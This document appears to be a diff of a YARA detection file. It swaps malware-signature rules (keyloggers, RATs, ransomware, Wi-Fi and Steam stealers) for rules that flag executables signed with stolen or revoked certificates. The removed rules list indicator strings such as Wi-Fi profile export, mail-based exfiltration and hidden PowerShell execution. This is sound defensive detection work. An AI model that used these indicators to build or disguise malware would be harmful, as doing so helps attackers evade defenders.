 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 2 of ( $var2* ) ) or ( 4 of ( $var2* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PLAN ALPHA LIMITED" and pe.signatures [ i ] . serial == "3a:9b:de:c1:0e:00:e7:80:31:6b:aa:eb:fe:7a:77:2c" )
 }
-rule DITEKSHEN_MALWARE_Win_PWSH_Poshkeylogger
+
+rule DITEKSHEN_INDICATOR_KB_CERT_73F9819F3A1A49Bac1E220D7F3E0009B : FILE
 {
 	meta:
-		description = "Detects PowerShell PoshKeylogger"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "a816d716-caeb-5f08-9043-29db531f9e7c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "06f448cf-1f0e-5db5-bdb5-30238c5f7341"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4612-L4627"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L954-L965"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "20bde87ded7e3b68bc554c4b9a6c2ef08514f0d47b6b144763927bede81ea540"
+		logic_hash = "9244fae0be6c1addbd0c740d7e153fd4109101184bc61375ddadb6d784769010"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = "::GetKeyboardState" ascii
-		$s2 = "GetAsyncKeyState(" ascii
-		$s3 = "::MapVirtualKey(" ascii
-		$s4 = "::GetAsyncKeyState" ascii
-		$s5 = "Start-Sleep" ascii
-		$s6 = "send-mailmessage" ascii
-		$s7 = "[System.IO.File]::AppendAllText($" ascii
-		$s8 = "new-object Management.Automation.PSCredential $" ascii
+		tags = "FILE"
+		thumbprint = "bb04986cbd65f0994a544f197fbb26abf91228d9"
+		importance = 20
 
 	condition:
-		6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jean Binquet" and pe.signatures [ i ] . serial == "73:f9:81:9f:3a:1a:49:ba:c1:e2:20:d7:f3:e0:00:9b" )
 }
-rule DITEKSHEN_MALWARE_Win_Fujinamarat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0989C97804C93Ec0004E2843 : FILE
 {
 	meta:
-		description = "Detects FujinamaRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "f6b08713-1c03-5914-b0a2-ea9164a3f2cb"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "13b2dd06-878e-5539-91d1-eff8607997c3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4629-L4645"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L967-L978"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "42557094afe67196442f46d76f156c09852d694bcc5f03eac51e79ad247c2fdd"
+		logic_hash = "65b695eed221db86928ebd32a1f3cb35729754ba41cb2e5b6cf944890d211120"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "920124"
-		snort3_sid = "920121"
-
-	strings:
-		$s1 = "GetAsyncKeyState" fullword ascii
-		$s2 = "HTTP/1.0" fullword wide
-		$s3 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" fullword wide
-		$s4 = "frmMain" fullword ascii
-		$s5 = "G<=>?@ABGGGGGGGGGGGGGGGGGGGGGGGGGGCDEF" fullword ascii
-		$s6 = "VBA6.DLL" fullword ascii
-		$s7 = "t_save" fullword ascii
+		thumbprint = "98549ae51b7208bda60b7309b415d887c385864b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shanghai Hintsoft Co., Ltd." and pe.signatures [ i ] . serial == "09:89:c9:78:04:c9:3e:c0:00:4e:28:43" )
 }
-rule DITEKSHEN_MALWARE_Win_Phorpiex : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6Ba32F984444Ea464Bea41D99A977Ea8 : FILE
 {
 	meta:
-		description = "Detects Phorpiex variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "e2d26c5f-939e-53e3-8730-622341d26273"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "6fee5b3f-f72e-531e-b11e-e402207072ff"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4647-L4666"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L980-L991"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4c48a20aaf37d65471710181238d2c39c1cb0fc5a37b9c411e8d4dcfd7a9e26e"
+		logic_hash = "fcabdd038a2594dffddbfff71a7a8a1abae89c637355b3be7e5f26c1eb9e39c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "ae9e65e26275d014a4a8398569af5eeddf7a472c"
+		importance = 20
 
-	strings:
-		$s1 = "ShEllExECutE=__\\DriveMgr.exe" fullword wide nocase
-		$s2 = "/c start __ & __\\DriveMgr.exe & exit" fullword wide nocase
-		$s3 = "%s\\autorun.inf" fullword wide
-		$s4 = "svchost." wide
-		$s5 = "%ls\\%d%d" wide
-		$s6 = "bitcoincash:" ascii
-		$s7 = "%ls:*:Enabled:%ls" fullword wide
-		$s8 = "%s\\%s\\DriveMgr.exe" fullword wide
-		$s9 = "api.wipmania.com" ascii
-		$v1_1 = "%appdata%" fullword wide
-		$v1_2 = "(iPhone;" ascii
-		$v1_3 = "/tst.php" ascii
+	condition:
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JIN CONSULTANCY LIMITED" and pe.signatures [ i ] . serial == "6b:a3:2f:98:44:44:ea:46:4b:ea:41:d9:9a:97:7e:a8" )
+}
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4F5A9Bf75Da76B949645475473793A7D : FILE
+{
+	meta:
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		author = "ditekSHen"
+		id = "094b56b9-15fc-5366-9023-c706613882c4"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L993-L1004"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "8f00efcd62a934fb6ec0205dc1d7bb7f7f3ab168150fee942536ef92f686d21d"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "f7de21bbdf5effb0f6739d505579907e9f812e6f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $v1* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXEC CONTROL LIMITED" and pe.signatures [ i ] . serial == "4f:5a:9b:f7:5d:a7:6b:94:96:45:47:54:73:79:3a:7d" )
 }
-rule DITEKSHEN_MALWARE_Win_EXEPWSH_Dlagent : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_68B050Aa3D2C16F77E14A16Dc8D1C1Ac : FILE
 {
 	meta:
-		description = "Detects SystemBC"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "f5e7490f-806c-52d2-8f1c-9e00ab3e2780"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b49d3f1d-34b4-578e-ab36-b0744deef548"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4668-L4687"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1006-L1017"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6380359db1ac775cea3ebb93f7cf22a92d2f2e634c6aa724e2814c10d4ed42f5"
+		logic_hash = "9de23897fbfe3c4a6d649558d1d71f890117ec80967bc5bd975aa6f33576c702"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$pwsh = "powershell" fullword ascii
-		$bitstansfer = "Start-BitsTransfer" ascii wide
-		$s1 = "GET %s HTTP/1" ascii
-		$s2 = "User-Agent:" ascii
-		$s3 = "-WindowStyle Hidden -ep bypass -file \"" fullword ascii
-		$s4 = "LdrLoadDll" fullword ascii
-		$v1 = "BEGINDATA" fullword ascii
-		$v2 = /HOST\d:/ ascii
-		$v3 = /PORT\d:/ ascii
-		$v4 = "TOR:" fullword ascii
-		$v5 = "Fwow64" fullword ascii
-		$v6 = "start" fullword ascii
+		thumbprint = "c757e09e7dc5859dbd00b0ccfdd006764c557a3d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( $pwsh and ( $bitstansfer or 2 of ( $s* ) ) ) or ( 5 of ( $v* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOW POKE LTD" and pe.signatures [ i ] . serial == "68:b0:50:aa:3d:2c:16:f7:7e:14:a1:6d:c8:d1:c1:ac" )
 }
-rule DITEKSHEN_MALWARE_Win_Hdlocker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0F2B44E398Ba76C5F57779C41548607B : FILE
 {
 	meta:
-		description = "Detects HDLocker ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "03ada32b-6ef5-5600-954b-e9f430c6ff2d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "6a962fd8-c2cd-5abd-8f80-95697771037c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4689-L4703"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1019-L1030"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "337678a4a780947841a19c401601f1be7218276c8d4161229567dc4d6026b16a"
+		logic_hash = "172622595a3f6a6ab4ac2677c3064fab87b0a872c261031331c99cbd58671da2"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "HDLocker_" fullword ascii
-		$s2 = ".log" fullword ascii
-		$s3 = "Scripting.FileSystemObject" fullword ascii
-		$s4 = "Boot" fullword ascii
-		$s5 = "hellwdo" fullword ascii
-		$s6 = "blackmoon" fullword ascii
-		$s7 = "BlackMoon RunTime Error:" ascii
+		thumbprint = "cef53e9ca954d1383a8ece037925aa4de9268f3f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIGITAL DR" and pe.signatures [ i ] . serial == "0f:2b:44:e3:98:ba:76:c5:f5:77:79:c4:15:48:60:7b" )
 }
-rule DITEKSHEN_MALWARE_Win_Vovalex : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5Ad4Ce116B131Daf8D784C6Fab2Ea1F1 : FILE
 {
 	meta:
-		description = "Detects Vovalex ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "967af585-8a91-5ed0-8400-a8a24d95fd12"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "abb6c51b-987a-5a1f-9d31-1422b41a6a6d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4705-L4718"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1032-L1043"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ea695521981f4b007eee50e95f7989dda1f07cc411c59450489bb17391ff29dc"
+		logic_hash = "3221ffd8203cbef8735ed48acd77daae6bee33ade236b1ff2ced81a0f27d4ce5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "README.VOVALEX.txt" fullword ascii
-		$s2 = "\\src\\phobos\\std\\" ascii
-		$s3 = "LoadLibraryA(\"Advapi32.dll\")" fullword ascii
-		$s4 = "Failed to spawn process \"" fullword ascii
-		$s5 = "=== Bypassed ===" fullword ascii
-		$s6 = "If you don't know where to buy" ascii
+		thumbprint = "de2dad893fdd49d7c0d498c0260acfb272588a2b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORDARA LTD" and pe.signatures [ i ] . serial == "5a:d4:ce:11:6b:13:1d:af:8d:78:4c:6f:ab:2e:a1:f1" )
 }
-rule DITEKSHEN_MALWARE_Win_Dharma : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_48Ce01Ac7E137F4313Cc5723Af817Da0 : FILE
 {
 	meta:
-		description = "Detects Dharma ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "070be95e-8d9c-5c4d-9d46-cddea6dbb682"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d5eb08a7-eb2b-5318-a941-da3ce0a6b634"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4720-L4728"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1045-L1056"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2727b2c0295e32699e08c3c79d7ac6fd52f1520358ac23290d40df428c969f4b"
+		logic_hash = "d92d4aa491b028620f17fd997a782f5e75247b2d3de7ef9026e2c62309275ce1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "C:\\crysis\\Release\\PDB\\payload.pdb" fullword ascii
+		thumbprint = "8f594f2e0665ffd656160aac235d8c490059a9cc"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ET HOMES LTD" and pe.signatures [ i ] . serial == "48:ce:01:ac:7e:13:7f:43:13:cc:57:23:af:81:7d:a0" )
 }
-rule DITEKSHEN_MALWARE_Win_Cryptolocker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_C7E62986C36246C64B8C9F2348141570 : FILE
 {
 	meta:
-		description = "Detects Cryptolocker ransomware variants (Betarasite)"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "4c6d714d-1fb1-55ce-8022-40f6f634e2cd"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "44d75e1d-5d5b-5d6f-8f7b-d94cd3908ed7"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4730-L4752"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1058-L1069"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e1700e8ace338c25119305878e8bc52210506bd42183007985ba9601abdab87b"
+		logic_hash = "dfb669ad42ac16d954405dc243b9d81dd9a748a14044d1fce3b71b490c58c82e"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "CryptoLocker" fullword wide
-		$x2 = ".betarasite" fullword wide
-		$x3 = "CMSTPBypass" fullword ascii
-		$s1 = "CommandToExecute" fullword ascii
-		$s2 = "SetInfFile" fullword ascii
-		$s3 = "SchoolPrject1" ascii
-		$s4 = "$730d5f64-bd57-47c1-9af4-d20aec714d02" fullword ascii
-		$s5 = "Encrypt" fullword ascii
-		$s6 = "Invalide Key! Please Try Again." fullword wide
-		$s7 = "RegAsm" fullword wide
-		$s8 = "Your key will be destroyed" wide
-		$s9 = "encrypted using RC4 and RSA-2048" wide
-		$c1 = "https://coinbase.com" fullword wide
-		$c2 = "https://localbictoins.com" fullword wide
-		$c3 = "https://bitpanda.com" fullword wide
+		thumbprint = "f779e06266802b395ef6d3dbfeb1cc6a0a2cfc47"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or ( 2 of ( $x* ) and 5 of ( $s* ) ) or ( all of ( $c* ) and 1 of ( $x* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC Mail.Ru" and pe.signatures [ i ] . serial == "c7:e6:29:86:c3:62:46:c6:4b:8c:9f:23:48:14:15:70" )
 }
-rule DITEKSHEN_MALWARE_Win_PWSH_Poshwifistealer
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ee663737D82Df09C7038A6A6693A8323 : FILE
 {
 	meta:
-		description = "Detects PowerShell PoshWiFiStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "69ac123d-b746-57f1-a488-547f9a9cdd86"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "c6684a9f-ca92-53e9-9723-9d2437a16fc6"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4754-L4765"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1086-L1097"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "769349360b5d22226a5339a9e8471d06731dc522475c9385c1c145a0488e0ad1"
+		logic_hash = "4057374b73ef13b6f101b939e11569cf010896097fd9322ab490c73d6808fa6f"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = "netsh wlan export profile" ascii
-		$s2 = "Send-MailMessage" ascii
-		$u1 = "https://github.com/axel05869/Wifi-Grab" ascii
-		$u2 = "/exploitechx/wifi-password-extractor" ascii
+		tags = "FILE"
+		thumbprint = "dc934afe82adbab8583e393568f81ab32c79aeea"
+		importance = 20
 
 	condition:
-		all of ( $s* ) or all of ( $u* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KREACIJA d.o.o." and pe.signatures [ i ] . serial == "00:ee:66:37:37:d8:2d:f0:9c:70:38:a6:a6:69:3a:83:23" )
 }
-rule DITEKSHEN_MALWARE_Win_Steamhook : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3D568325Dec56Abf48E72317675Cacb7 : FILE
 {
 	meta:
-		description = "Detects potential Steam stealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "7533fb83-d721-54e6-8ae1-1c840dd5a13d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e958b9c4-2f1b-5b5d-8a44-7393204a6f41"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4767-L4781"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1099-L1110"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "da743ca99fd19828e3938875acaf6544f17d884587a59623c8361f5905af4a57"
+		logic_hash = "a575c9989a3ee7824e8734940877ddb255b19070def460508f70d32f457411ac"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Mozilla/4.0 (compatible; )" fullword ascii
-		$s2 = "/steam/upload.php" ascii
-		$s3 = ".*?(ssfn\\d+)" fullword ascii
-		$s4 = "add cookie failed..." fullword ascii
-		$s5 = "Content-Type: multipart/form-data; boundary=--MULTI-PARTS-FORM-DATA-BOUNDARY" fullword ascii
-		$pdb1 = "\\SteamHook\\Install\\" ascii
-		$pdb2 = "\\SteamHook\\dll\\" ascii
+		thumbprint = "e5b21024907c9115dafccc3d4f66982c7d5641bc"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $pdb* ) or ( 1 of ( $pdb* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Virtual Byte F-B-I" and pe.signatures [ i ] . serial == "3d:56:83:25:de:c5:6a:bf:48:e7:23:17:67:5c:ac:b7" )
 }
-rule DITEKSHEN_MALWARE_Win_Netwire : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3533080B377F80C0Ea826B2492Bf767B : FILE
 {
 	meta:
-		description = "Detects NetWire RAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "c215f449-c725-51da-8f5b-2619bc282b22"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "42d2328e-742e-5c35-aa14-3b42442543ce"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4783-L4805"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1127-L1138"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bae4f0cd7a431336bd784ba95f6ba3396e6f0f12c081e62482ad37ff859c1f1c"
+		logic_hash = "a7adb9190be4a9cf60adf4b55c8abaa80e01224ea834fc05705afef37703899e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "SOFTWARE\\NetWire" fullword ascii
-		$x2 = { 4e 65 74 57 69 72 65 00 53 4f 46 54 57 41 52 45 5c 00 }
-		$s1 = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword ascii
-		$s2 = "filenames.txt" fullword ascii
-		$s3 = "GET %s HTTP/1.1" fullword ascii
-		$s4 = "[%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii
-		$s5 = "Host.exe" fullword ascii
-		$s6 = "-m \"%s\"" fullword ascii
-		$g1 = "HostId" fullword ascii
-		$g2 = "History" fullword ascii
-		$g3 = "encrypted_key" fullword ascii
-		$g4 = "Install Date" fullword ascii
-		$g5 = "hostname" fullword ascii
-		$g6 = "encryptedUsername" fullword ascii
-		$g7 = "encryptedPassword" fullword ascii
+		thumbprint = "2afcc4cdee842d80bf7b6406fb503957c8a09b4d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $x* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( all of ( $g* ) and ( 2 of ( $s* ) or 1 of ( $x* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xA8\\x9C\\xE8\\xBF\\xAA\\xD0\\x91\\xE8\\xBF\\xAA\\xD0\\x91\\xE5\\xA8\\x9C\\xE5\\x93\\xA6\\xE5\\xB0\\xBA\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xD0\\x91\\xE8\\xBF\\xAA\\xD0\\x91\\xE5\\xB0\\xBA\\xE5\\xB0\\xBA\\xE8\\xBF\\xAA\\xE5\\x93\\xA6\\xE8\\xBF\\xAA\\xE5\\x8B\\x92\\xD0\\x91\\xE5\\x8B\\x92\\xE5\\x93\\xA6\\xE5\\x8B\\x92\\xE5\\x93\\xA6\\xD0\\x91" and pe.signatures [ i ] . serial == "35:33:08:0b:37:7f:80:c0:ea:82:6b:24:92:bf:76:7b" )
 }
-rule DITEKSHEN_MALWARE_Win_Breakstaf : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B0Ecd32F95F8761B8A6D5710C7F34590 : FILE
 {
 	meta:
-		description = "Detects BreakStaf ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "3c8ca485-2cb4-56fd-a1f5-16b43515cec9"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2535c9eb-ed4a-52b9-8ad5-80c44c035135"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4807-L4827"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1140-L1151"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "56078b797c64ce77398f9b92e5677f7159d8357eafb03cf62bb30f06d4f3b2e3"
+		logic_hash = "5c181dab1f39138c67650d6654353de2be29cdbf45e0f5235776d28d40194f24"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "C:\\Program files" wide
-		$s2 = "C:\\Program files (x86)" wide
-		$s3 = "C:\\System Volume Information" wide
-		$s4 = "C:\\$Recycle.Bin" wide
-		$s5 = "C:\\Windows" wide
-		$s6 = ".?AVRandomNumberGenerator@Crypto" ascii
-		$s7 = ".?AV?$SymmetricCipherFinal@" ascii
-		$s8 = ".breakstaf" fullword wide nocase
-		$s9 = "readme.txt" fullword wide nocase
-		$s10 = ".VHD" fullword wide nocase
-		$s11 = ".vhdx" fullword wide nocase
-		$s12 = ".BAK" fullword wide nocase
-		$s13 = ".BAC" fullword wide nocase
+		thumbprint = "2e25e7e8abc238b05de5e2a482e51ed324fbaa76"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 12 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x96\\xAF\\xD0\\xA8\\xD0\\xA8\\xE5\\xBC\\x97\\xE6\\xAF\\x94\\xE5\\xBC\\x97\\xD0\\xA8\\xE6\\xAF\\x94\\xD0\\xA8\\xE5\\xBC\\x97\\xD0\\xA8\\xE5\\xB0\\x94\\xE5\\xBC\\x97\\xE5\\xBC\\x97\\xD0\\xA8\\xE5\\xB0\\x94\\xD0\\xA8\\xE6\\x96\\xAF\\xE5\\xB0\\x94\\xE5\\xBC\\x97" and pe.signatures [ i ] . serial == "00:b0:ec:d3:2f:95:f8:76:1b:8a:6d:57:10:c7:f3:45:90" )
 }
-rule DITEKSHEN_MALWARE_Win_Kitty : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3A727248E1940C5Bf91A466B29C3B9Cd : FILE
 {
 	meta:
-		description = "Detects HelloKitty ransomware, triggers on FIVEHANDS"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
